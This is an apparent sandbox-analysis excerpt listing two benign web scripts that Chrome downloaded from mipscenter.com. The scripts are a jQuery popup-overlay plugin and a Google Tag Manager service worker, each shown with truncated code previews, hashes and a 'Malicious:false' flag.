                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_4bad469c4113485f1a84ece2da345aa8.js
                                                                                                                                                                                                                                        Preview:;./*!. * jQuery Popup Overlay. *. * @requires jQuery v1.7.1+. * @link https://vast-engineering.github.com/jquery-popup-overlay/. */.(function($){var $window=$(window);var options={};var zindexvalues=[];var lastclicked=[];var scrollbarwidth;var bodymarginright=null;var opensuffix='_open';var closesuffix='_close';var visiblePopupsArray=[];var transitionsupport=null;var opentimer;var iOS=/(iPad|iPhone|iPod)/.test(navigator.userAgent);var focusableElementsString="a[href], area[href], input:not([disabled]), select:not([disabled]), textarea:not([disabled]), button:not([disabled]), iframe, object, embed, *[tabindex], *[contenteditable]";var methods={_init:function(el){var $el=$(el);var options=$el.data('popupoptions');lastclicked[el.id]=false;zindexvalues[el.id]=0;if(!$el.data('popup-initialized')){$el.attr('data-popup-initialized','true');methods._initonce(el);}.if(options.autoopen){setTimeout(function(){methods.show(el,0);},0);}},_initonce:function(el){var $el=$(el);var $body=$('body');var
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1236)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):20705
                                                                                                                                                                                                                                        Entropy (8bit):5.470065366668187
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:9E67DCDB1F1B369CB5D5D77EB947102A
                                                                                                                                                                                                                                        SHA1:EF6A1C09FE34FAD919456157FF0C66BCDC03DF3A
                                                                                                                                                                                                                                        SHA-256:2E169E8A7BD2F1F80187C99B59ECEAA1E3233D030361802F717D31DA1312323C
                                                                                                                                                                                                                                        SHA-512:FA1746D661425F6113E2E6884BB35074169FDD4C43345C797945FE10858EDA9A2E68F89CBD8EDC8F0976BF0420690D13FD82C80D217544C839F851C117FFD00E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/static/service_worker/53k0/sw.js?origin=https%3A%2F%2Fmipscenter.com
                                                                                                                                                                                                                                        Preview:'use strict';var aa=function(a){function b(d){return a.next(d)}function c(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}f(a.next())})},h=function(a){return aa(a())};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n={},r=null,x=function(a){var b=3;b===void 0&&(b=0);w();const c=n[b],d=Array(Math.floor(a.length/3)),e=c[64]||"";let f=0,g=0;for(;f<a.length-2;f+=3){const p=a[f],q=a[f+1],A=a[f+2],v=c[p>>2],m=c[(p&3)<<4|q>>4],t=c[(q&15)<<2|A>>6],u=c[A&63];d[g++]=""+v+m+t+u}let k=0,l=e;switch(a.length-f){case 2:k=a[f+1],l=c[(k&15)<<2]||e;case 1:const p=a[f];d[g]=""+c[p>>2]+c[(p&3)<<4|k>>4]+l+e}return d.join("")},B=function(a){const b=a.length;let c=b*3/4;c%3?c=Math.floor(c):"=.".indexOf(a[b-1])!=-1&&(c="=.".indexOf(a[b-.2])!=-1?c-2:c-1);const d=new Uint8Array(c);let e=0;ba(a,function(f){d[e++]=f});return e!==c?d.subarray(0,e):d},ba=function(a,b){function c(e){for(;d<a.len
                                                                                                                                                                                                                                        No static file info